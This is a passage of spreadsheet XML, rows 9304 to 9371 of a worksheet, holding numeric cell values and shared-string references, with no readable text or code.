        <v>8877</v>
      </c>
      <c r="D9304" s="2">
        <v>1.0</v>
      </c>
      <c r="E9304" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9304" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9305" ht="15.75" customHeight="1">
      <c r="A9305" s="1">
        <v>7452.0</v>
      </c>
      <c r="B9305" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C9305" s="2" t="s">
        <v>8878</v>
      </c>
      <c r="D9305" s="2">
        <v>1.0</v>
      </c>
      <c r="E9305" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9305" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9306" ht="15.75" customHeight="1">
      <c r="A9306" s="1">
        <v>7698.0</v>
      </c>
      <c r="B9306" s="2">
        <v>5.1967816E7</v>
      </c>
      <c r="C9306" s="2" t="s">
        <v>8879</v>
      </c>
      <c r="D9306" s="2">
        <v>1.0</v>
      </c>
      <c r="E9306" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9306" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9307" ht="15.75" customHeight="1">
      <c r="A9307" s="1">
        <v>8574.0</v>
      </c>
      <c r="B9307" s="2">
        <v>5.4205831E7</v>
      </c>
      <c r="C9307" s="2" t="s">
        <v>8880</v>
      </c>
      <c r="D9307" s="2">
        <v>1.0</v>
      </c>
      <c r="E9307" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9307" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9308" ht="15.75" customHeight="1">
      <c r="A9308" s="1">
        <v>10867.0</v>
      </c>
      <c r="B9308" s="2">
        <v>1.6399698E7</v>
      </c>
      <c r="C9308" s="2" t="s">
        <v>8881</v>
      </c>
      <c r="D9308" s="2">
        <v>1.0</v>
      </c>
      <c r="E9308" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9308" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9309" ht="15.75" customHeight="1">
      <c r="A9309" s="1">
        <v>14552.0</v>
      </c>
      <c r="B9309" s="2">
        <v>3.9955698E7</v>
      </c>
      <c r="C9309" s="2" t="s">
        <v>8882</v>
      </c>
      <c r="D9309" s="2">
        <v>1.0</v>
      </c>
      <c r="E9309" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9309" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9310" ht="15.75" customHeight="1">
      <c r="A9310" s="1">
        <v>20054.0</v>
      </c>
      <c r="B9310" s="2">
        <v>8136182.0</v>
      </c>
      <c r="C9310" s="2" t="s">
        <v>8883</v>
      </c>
      <c r="D9310" s="2">
        <v>1.0</v>
      </c>
      <c r="E9310" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9310" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9311" ht="15.75" customHeight="1">
      <c r="A9311" s="1">
        <v>33693.0</v>
      </c>
      <c r="B9311" s="2">
        <v>8457000.0</v>
      </c>
      <c r="C9311" s="2" t="s">
        <v>8884</v>
      </c>
      <c r="D9311" s="2">
        <v>1.0</v>
      </c>
      <c r="E9311" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9311" s="2">
        <v>0.1137566137566138</v>
      </c>
    </row>
    <row r="9312" ht="15.75" customHeight="1">
      <c r="A9312" s="1">
        <v>19533.0</v>
      </c>
      <c r="B9312" s="2">
        <v>5.5998826E7</v>
      </c>
      <c r="C9312" s="2" t="s">
        <v>8885</v>
      </c>
      <c r="D9312" s="2">
        <v>1.0</v>
      </c>
      <c r="E9312" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9312" s="2">
        <v>0.1137152777777778</v>
      </c>
    </row>
    <row r="9313" ht="15.75" customHeight="1">
      <c r="A9313" s="1">
        <v>6313.0</v>
      </c>
      <c r="B9313" s="2">
        <v>4.824564E7</v>
      </c>
      <c r="C9313" s="2" t="s">
        <v>8886</v>
      </c>
      <c r="D9313" s="2">
        <v>1.0</v>
      </c>
      <c r="E9313" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9313" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="9314" ht="15.75" customHeight="1">
      <c r="A9314" s="1">
        <v>30605.0</v>
      </c>
      <c r="B9314" s="2">
        <v>4133664.0</v>
      </c>
      <c r="C9314" s="2" t="s">
        <v>8887</v>
      </c>
      <c r="D9314" s="2">
        <v>1.0</v>
      </c>
      <c r="E9314" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9314" s="2">
        <v>0.1121794871794871</v>
      </c>
    </row>
    <row r="9315" ht="15.75" customHeight="1">
      <c r="A9315" s="1">
        <v>3415.0</v>
      </c>
      <c r="B9315" s="2">
        <v>3.8132189E7</v>
      </c>
      <c r="C9315" s="2" t="s">
        <v>8888</v>
      </c>
      <c r="D9315" s="2">
        <v>1.0</v>
      </c>
      <c r="E9315" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9315" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9316" ht="15.75" customHeight="1">
      <c r="A9316" s="1">
        <v>5759.0</v>
      </c>
      <c r="B9316" s="2">
        <v>4.6671116E7</v>
      </c>
      <c r="C9316" s="2" t="s">
        <v>8889</v>
      </c>
      <c r="D9316" s="2">
        <v>1.0</v>
      </c>
      <c r="E9316" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9316" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9317" ht="15.75" customHeight="1">
      <c r="A9317" s="1">
        <v>9642.0</v>
      </c>
      <c r="B9317" s="2">
        <v>5.6242752E7</v>
      </c>
      <c r="C9317" s="2" t="s">
        <v>8890</v>
      </c>
      <c r="D9317" s="2">
        <v>1.0</v>
      </c>
      <c r="E9317" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9317" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9318" ht="15.75" customHeight="1">
      <c r="A9318" s="1">
        <v>11762.0</v>
      </c>
      <c r="B9318" s="2">
        <v>2.4178824E7</v>
      </c>
      <c r="C9318" s="2" t="s">
        <v>8891</v>
      </c>
      <c r="D9318" s="2">
        <v>1.0</v>
      </c>
      <c r="E9318" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9318" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9319" ht="15.75" customHeight="1">
      <c r="A9319" s="1">
        <v>13944.0</v>
      </c>
      <c r="B9319" s="2">
        <v>3.7186858E7</v>
      </c>
      <c r="C9319" s="2" t="s">
        <v>8892</v>
      </c>
      <c r="D9319" s="2">
        <v>1.0</v>
      </c>
      <c r="E9319" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9319" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9320" ht="15.75" customHeight="1">
      <c r="A9320" s="1">
        <v>14189.0</v>
      </c>
      <c r="B9320" s="2">
        <v>381555.0</v>
      </c>
      <c r="C9320" s="2" t="s">
        <v>8893</v>
      </c>
      <c r="D9320" s="2">
        <v>1.0</v>
      </c>
      <c r="E9320" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9320" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9321" ht="15.75" customHeight="1">
      <c r="A9321" s="1">
        <v>19815.0</v>
      </c>
      <c r="B9321" s="2">
        <v>5.6955993E7</v>
      </c>
      <c r="C9321" s="2" t="s">
        <v>8894</v>
      </c>
      <c r="D9321" s="2">
        <v>1.0</v>
      </c>
      <c r="E9321" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9321" s="2">
        <v>0.1121593291404612</v>
      </c>
    </row>
    <row r="9322" ht="15.75" customHeight="1">
      <c r="A9322" s="1">
        <v>111.0</v>
      </c>
      <c r="B9322" s="2">
        <v>1.295882E7</v>
      </c>
      <c r="C9322" s="2" t="s">
        <v>8895</v>
      </c>
      <c r="D9322" s="2">
        <v>1.0</v>
      </c>
      <c r="E9322" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9322" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9323" ht="15.75" customHeight="1">
      <c r="A9323" s="1">
        <v>1518.0</v>
      </c>
      <c r="B9323" s="2">
        <v>2.735299E7</v>
      </c>
      <c r="C9323" s="2" t="s">
        <v>8896</v>
      </c>
      <c r="D9323" s="2">
        <v>1.0</v>
      </c>
      <c r="E9323" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9323" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9324" ht="15.75" customHeight="1">
      <c r="A9324" s="1">
        <v>3425.0</v>
      </c>
      <c r="B9324" s="2">
        <v>3.8166197E7</v>
      </c>
      <c r="C9324" s="2" t="s">
        <v>8897</v>
      </c>
      <c r="D9324" s="2">
        <v>1.0</v>
      </c>
      <c r="E9324" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9324" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9325" ht="15.75" customHeight="1">
      <c r="A9325" s="1">
        <v>4695.0</v>
      </c>
      <c r="B9325" s="2">
        <v>4.3233737E7</v>
      </c>
      <c r="C9325" s="2" t="s">
        <v>8898</v>
      </c>
      <c r="D9325" s="2">
        <v>1.0</v>
      </c>
      <c r="E9325" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9325" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9326" ht="15.75" customHeight="1">
      <c r="A9326" s="1">
        <v>4714.0</v>
      </c>
      <c r="B9326" s="2">
        <v>4.3298071E7</v>
      </c>
      <c r="C9326" s="2" t="s">
        <v>8899</v>
      </c>
      <c r="D9326" s="2">
        <v>1.0</v>
      </c>
      <c r="E9326" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9326" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9327" ht="15.75" customHeight="1">
      <c r="A9327" s="1">
        <v>7439.0</v>
      </c>
      <c r="B9327" s="2">
        <v>5.12178E7</v>
      </c>
      <c r="C9327" s="2" t="s">
        <v>8900</v>
      </c>
      <c r="D9327" s="2">
        <v>1.0</v>
      </c>
      <c r="E9327" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9327" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9328" ht="15.75" customHeight="1">
      <c r="A9328" s="1">
        <v>8537.0</v>
      </c>
      <c r="B9328" s="2">
        <v>5.4124308E7</v>
      </c>
      <c r="C9328" s="2" t="s">
        <v>8901</v>
      </c>
      <c r="D9328" s="2">
        <v>1.0</v>
      </c>
      <c r="E9328" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9328" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9329" ht="15.75" customHeight="1">
      <c r="A9329" s="1">
        <v>15420.0</v>
      </c>
      <c r="B9329" s="2">
        <v>4.2886131E7</v>
      </c>
      <c r="C9329" s="2" t="s">
        <v>8902</v>
      </c>
      <c r="D9329" s="2">
        <v>1.0</v>
      </c>
      <c r="E9329" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9329" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9330" ht="15.75" customHeight="1">
      <c r="A9330" s="1">
        <v>15642.0</v>
      </c>
      <c r="B9330" s="2">
        <v>4.360399E7</v>
      </c>
      <c r="C9330" s="2" t="s">
        <v>8903</v>
      </c>
      <c r="D9330" s="2">
        <v>1.0</v>
      </c>
      <c r="E9330" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9330" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9331" ht="15.75" customHeight="1">
      <c r="A9331" s="1">
        <v>27740.0</v>
      </c>
      <c r="B9331" s="2">
        <v>2.3080878E7</v>
      </c>
      <c r="C9331" s="2" t="s">
        <v>8904</v>
      </c>
      <c r="D9331" s="2">
        <v>1.0</v>
      </c>
      <c r="E9331" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9331" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9332" ht="15.75" customHeight="1">
      <c r="A9332" s="1">
        <v>29783.0</v>
      </c>
      <c r="B9332" s="2">
        <v>3.5019921E7</v>
      </c>
      <c r="C9332" s="2" t="s">
        <v>8905</v>
      </c>
      <c r="D9332" s="2">
        <v>1.0</v>
      </c>
      <c r="E9332" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9332" s="2">
        <v>0.1121399176954732</v>
      </c>
    </row>
    <row r="9333" ht="15.75" customHeight="1">
      <c r="A9333" s="1">
        <v>13.0</v>
      </c>
      <c r="B9333" s="2">
        <v>1.0326698E7</v>
      </c>
      <c r="C9333" s="2" t="s">
        <v>8906</v>
      </c>
      <c r="D9333" s="2">
        <v>1.0</v>
      </c>
      <c r="E9333" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9333" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9334" ht="15.75" customHeight="1">
      <c r="A9334" s="1">
        <v>58.0</v>
      </c>
      <c r="B9334" s="2">
        <v>1.110691E7</v>
      </c>
      <c r="C9334" s="2" t="s">
        <v>8907</v>
      </c>
      <c r="D9334" s="2">
        <v>1.0</v>
      </c>
      <c r="E9334" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9334" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9335" ht="15.75" customHeight="1">
      <c r="A9335" s="1">
        <v>436.0</v>
      </c>
      <c r="B9335" s="2">
        <v>1.7012444E7</v>
      </c>
      <c r="C9335" s="2" t="s">
        <v>8908</v>
      </c>
      <c r="D9335" s="2">
        <v>1.0</v>
      </c>
      <c r="E9335" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9335" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9336" ht="15.75" customHeight="1">
      <c r="A9336" s="1">
        <v>504.0</v>
      </c>
      <c r="B9336" s="2">
        <v>1.8063539E7</v>
      </c>
      <c r="C9336" s="2" t="s">
        <v>8909</v>
      </c>
      <c r="D9336" s="2">
        <v>1.0</v>
      </c>
      <c r="E9336" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9336" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9337" ht="15.75" customHeight="1">
      <c r="A9337" s="1">
        <v>801.0</v>
      </c>
      <c r="B9337" s="2">
        <v>2.1280532E7</v>
      </c>
      <c r="C9337" s="2" t="s">
        <v>8910</v>
      </c>
      <c r="D9337" s="2">
        <v>1.0</v>
      </c>
      <c r="E9337" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9337" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9338" ht="15.75" customHeight="1">
      <c r="A9338" s="1">
        <v>942.0</v>
      </c>
      <c r="B9338" s="2">
        <v>2.2476007E7</v>
      </c>
      <c r="C9338" s="2" t="s">
        <v>8911</v>
      </c>
      <c r="D9338" s="2">
        <v>1.0</v>
      </c>
      <c r="E9338" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9338" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9339" ht="15.75" customHeight="1">
      <c r="A9339" s="1">
        <v>967.0</v>
      </c>
      <c r="B9339" s="2">
        <v>2.2748309E7</v>
      </c>
      <c r="C9339" s="2" t="s">
        <v>8912</v>
      </c>
      <c r="D9339" s="2">
        <v>1.0</v>
      </c>
      <c r="E9339" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9339" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9340" ht="15.75" customHeight="1">
      <c r="A9340" s="1">
        <v>973.0</v>
      </c>
      <c r="B9340" s="2">
        <v>2.2760325E7</v>
      </c>
      <c r="C9340" s="2" t="s">
        <v>8913</v>
      </c>
      <c r="D9340" s="2">
        <v>1.0</v>
      </c>
      <c r="E9340" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9340" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9341" ht="15.75" customHeight="1">
      <c r="A9341" s="1">
        <v>1065.0</v>
      </c>
      <c r="B9341" s="2">
        <v>2.3519892E7</v>
      </c>
      <c r="C9341" s="2" t="s">
        <v>8914</v>
      </c>
      <c r="D9341" s="2">
        <v>1.0</v>
      </c>
      <c r="E9341" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9341" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9342" ht="15.75" customHeight="1">
      <c r="A9342" s="1">
        <v>1097.0</v>
      </c>
      <c r="B9342" s="2">
        <v>2.3828929E7</v>
      </c>
      <c r="C9342" s="2" t="s">
        <v>8915</v>
      </c>
      <c r="D9342" s="2">
        <v>1.0</v>
      </c>
      <c r="E9342" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9342" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9343" ht="15.75" customHeight="1">
      <c r="A9343" s="1">
        <v>1352.0</v>
      </c>
      <c r="B9343" s="2">
        <v>2.5960572E7</v>
      </c>
      <c r="C9343" s="2" t="s">
        <v>8916</v>
      </c>
      <c r="D9343" s="2">
        <v>1.0</v>
      </c>
      <c r="E9343" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9343" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9344" ht="15.75" customHeight="1">
      <c r="A9344" s="1">
        <v>1462.0</v>
      </c>
      <c r="B9344" s="2">
        <v>2.690009E7</v>
      </c>
      <c r="C9344" s="2" t="s">
        <v>8917</v>
      </c>
      <c r="D9344" s="2">
        <v>1.0</v>
      </c>
      <c r="E9344" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9344" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9345" ht="15.75" customHeight="1">
      <c r="A9345" s="1">
        <v>1487.0</v>
      </c>
      <c r="B9345" s="2">
        <v>2.7174898E7</v>
      </c>
      <c r="C9345" s="2" t="s">
        <v>8918</v>
      </c>
      <c r="D9345" s="2">
        <v>1.0</v>
      </c>
      <c r="E9345" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9345" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9346" ht="15.75" customHeight="1">
      <c r="A9346" s="1">
        <v>1501.0</v>
      </c>
      <c r="B9346" s="2">
        <v>2.7256147E7</v>
      </c>
      <c r="C9346" s="2" t="s">
        <v>8919</v>
      </c>
      <c r="D9346" s="2">
        <v>1.0</v>
      </c>
      <c r="E9346" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9346" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9347" ht="15.75" customHeight="1">
      <c r="A9347" s="1">
        <v>1523.0</v>
      </c>
      <c r="B9347" s="2">
        <v>2.7417041E7</v>
      </c>
      <c r="C9347" s="2" t="s">
        <v>8920</v>
      </c>
      <c r="D9347" s="2">
        <v>1.0</v>
      </c>
      <c r="E9347" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9347" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9348" ht="15.75" customHeight="1">
      <c r="A9348" s="1">
        <v>1711.0</v>
      </c>
      <c r="B9348" s="2">
        <v>2.8582936E7</v>
      </c>
      <c r="C9348" s="2" t="s">
        <v>8921</v>
      </c>
      <c r="D9348" s="2">
        <v>1.0</v>
      </c>
      <c r="E9348" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9348" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9349" ht="15.75" customHeight="1">
      <c r="A9349" s="1">
        <v>1763.0</v>
      </c>
      <c r="B9349" s="2">
        <v>2.8930135E7</v>
      </c>
      <c r="C9349" s="2" t="s">
        <v>8922</v>
      </c>
      <c r="D9349" s="2">
        <v>1.0</v>
      </c>
      <c r="E9349" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9349" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9350" ht="15.75" customHeight="1">
      <c r="A9350" s="1">
        <v>1847.0</v>
      </c>
      <c r="B9350" s="2">
        <v>2.9435648E7</v>
      </c>
      <c r="C9350" s="2" t="s">
        <v>8923</v>
      </c>
      <c r="D9350" s="2">
        <v>1.0</v>
      </c>
      <c r="E9350" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9350" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9351" ht="15.75" customHeight="1">
      <c r="A9351" s="1">
        <v>1883.0</v>
      </c>
      <c r="B9351" s="2">
        <v>2.9757063E7</v>
      </c>
      <c r="C9351" s="2" t="s">
        <v>8924</v>
      </c>
      <c r="D9351" s="2">
        <v>1.0</v>
      </c>
      <c r="E9351" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9351" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9352" ht="15.75" customHeight="1">
      <c r="A9352" s="1">
        <v>2135.0</v>
      </c>
      <c r="B9352" s="2">
        <v>3.1508769E7</v>
      </c>
      <c r="C9352" s="2" t="s">
        <v>8925</v>
      </c>
      <c r="D9352" s="2">
        <v>1.0</v>
      </c>
      <c r="E9352" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9352" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9353" ht="15.75" customHeight="1">
      <c r="A9353" s="1">
        <v>2405.0</v>
      </c>
      <c r="B9353" s="2">
        <v>3.3446034E7</v>
      </c>
      <c r="C9353" s="2" t="s">
        <v>8926</v>
      </c>
      <c r="D9353" s="2">
        <v>1.0</v>
      </c>
      <c r="E9353" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9353" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9354" ht="15.75" customHeight="1">
      <c r="A9354" s="1">
        <v>2628.0</v>
      </c>
      <c r="B9354" s="2">
        <v>3.4540117E7</v>
      </c>
      <c r="C9354" s="2" t="s">
        <v>8927</v>
      </c>
      <c r="D9354" s="2">
        <v>1.0</v>
      </c>
      <c r="E9354" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9354" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9355" ht="15.75" customHeight="1">
      <c r="A9355" s="1">
        <v>2696.0</v>
      </c>
      <c r="B9355" s="2">
        <v>3.4850588E7</v>
      </c>
      <c r="C9355" s="2" t="s">
        <v>8928</v>
      </c>
      <c r="D9355" s="2">
        <v>1.0</v>
      </c>
      <c r="E9355" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9355" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9356" ht="15.75" customHeight="1">
      <c r="A9356" s="1">
        <v>2772.0</v>
      </c>
      <c r="B9356" s="2">
        <v>3.5160905E7</v>
      </c>
      <c r="C9356" s="2" t="s">
        <v>8929</v>
      </c>
      <c r="D9356" s="2">
        <v>1.0</v>
      </c>
      <c r="E9356" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9356" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9357" ht="15.75" customHeight="1">
      <c r="A9357" s="1">
        <v>2866.0</v>
      </c>
      <c r="B9357" s="2">
        <v>3.5567566E7</v>
      </c>
      <c r="C9357" s="2" t="s">
        <v>8930</v>
      </c>
      <c r="D9357" s="2">
        <v>1.0</v>
      </c>
      <c r="E9357" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9357" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9358" ht="15.75" customHeight="1">
      <c r="A9358" s="1">
        <v>2960.0</v>
      </c>
      <c r="B9358" s="2">
        <v>3.6055122E7</v>
      </c>
      <c r="C9358" s="2" t="s">
        <v>8931</v>
      </c>
      <c r="D9358" s="2">
        <v>1.0</v>
      </c>
      <c r="E9358" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9358" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9359" ht="15.75" customHeight="1">
      <c r="A9359" s="1">
        <v>3135.0</v>
      </c>
      <c r="B9359" s="2">
        <v>3.6880535E7</v>
      </c>
      <c r="C9359" s="2" t="s">
        <v>8932</v>
      </c>
      <c r="D9359" s="2">
        <v>1.0</v>
      </c>
      <c r="E9359" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9359" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9360" ht="15.75" customHeight="1">
      <c r="A9360" s="1">
        <v>3297.0</v>
      </c>
      <c r="B9360" s="2">
        <v>3.7530081E7</v>
      </c>
      <c r="C9360" s="2" t="s">
        <v>8933</v>
      </c>
      <c r="D9360" s="2">
        <v>1.0</v>
      </c>
      <c r="E9360" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9360" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9361" ht="15.75" customHeight="1">
      <c r="A9361" s="1">
        <v>3417.0</v>
      </c>
      <c r="B9361" s="2">
        <v>3.8132803E7</v>
      </c>
      <c r="C9361" s="2" t="s">
        <v>8934</v>
      </c>
      <c r="D9361" s="2">
        <v>1.0</v>
      </c>
      <c r="E9361" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9361" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9362" ht="15.75" customHeight="1">
      <c r="A9362" s="1">
        <v>3541.0</v>
      </c>
      <c r="B9362" s="2">
        <v>3.8696032E7</v>
      </c>
      <c r="C9362" s="2" t="s">
        <v>8935</v>
      </c>
      <c r="D9362" s="2">
        <v>1.0</v>
      </c>
      <c r="E9362" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9362" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9363" ht="15.75" customHeight="1">
      <c r="A9363" s="1">
        <v>3765.0</v>
      </c>
      <c r="B9363" s="2">
        <v>3.9821986E7</v>
      </c>
      <c r="C9363" s="2" t="s">
        <v>8936</v>
      </c>
      <c r="D9363" s="2">
        <v>1.0</v>
      </c>
      <c r="E9363" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9363" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9364" ht="15.75" customHeight="1">
      <c r="A9364" s="1">
        <v>3863.0</v>
      </c>
      <c r="B9364" s="2">
        <v>4.0326601E7</v>
      </c>
      <c r="C9364" s="2" t="s">
        <v>8937</v>
      </c>
      <c r="D9364" s="2">
        <v>1.0</v>
      </c>
      <c r="E9364" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9364" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9365" ht="15.75" customHeight="1">
      <c r="A9365" s="1">
        <v>3878.0</v>
      </c>
      <c r="B9365" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C9365" s="2" t="s">
        <v>8938</v>
      </c>
      <c r="D9365" s="2">
        <v>1.0</v>
      </c>
      <c r="E9365" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9365" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9366" ht="15.75" customHeight="1">
      <c r="A9366" s="1">
        <v>4126.0</v>
      </c>
      <c r="B9366" s="2">
        <v>4.1378967E7</v>
      </c>
      <c r="C9366" s="2" t="s">
        <v>8939</v>
      </c>
      <c r="D9366" s="2">
        <v>1.0</v>
      </c>
      <c r="E9366" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9366" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9367" ht="15.75" customHeight="1">
      <c r="A9367" s="1">
        <v>4208.0</v>
      </c>
      <c r="B9367" s="2">
        <v>4.1686985E7</v>
      </c>
      <c r="C9367" s="2" t="s">
        <v>8940</v>
      </c>
      <c r="D9367" s="2">
        <v>1.0</v>
      </c>
      <c r="E9367" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9367" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9368" ht="15.75" customHeight="1">
      <c r="A9368" s="1">
        <v>4566.0</v>
      </c>
      <c r="B9368" s="2">
        <v>4.2726323E7</v>
      </c>
      <c r="C9368" s="2" t="s">
        <v>8941</v>
      </c>
      <c r="D9368" s="2">
        <v>1.0</v>
      </c>
      <c r="E9368" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9368" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9369" ht="15.75" customHeight="1">
      <c r="A9369" s="1">
        <v>4608.0</v>
      </c>
      <c r="B9369" s="2">
        <v>4.2897244E7</v>
      </c>
      <c r="C9369" s="2" t="s">
        <v>8942</v>
      </c>
      <c r="D9369" s="2">
        <v>1.0</v>
      </c>
      <c r="E9369" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9369" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9370" ht="15.75" customHeight="1">
      <c r="A9370" s="1">
        <v>4634.0</v>
      </c>
      <c r="B9370" s="2">
        <v>4.3004424E7</v>
      </c>
      <c r="C9370" s="2" t="s">
        <v>8943</v>
      </c>
      <c r="D9370" s="2">
        <v>1.0</v>
      </c>
      <c r="E9370" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9370" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9371" ht="15.75" customHeight="1">
      <c r="A9371" s="1">
        <v>5114.0</v>
      </c>
      <c r="B9371" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C9371" s="2" t="s">
        <v>8944</v>
      </c>
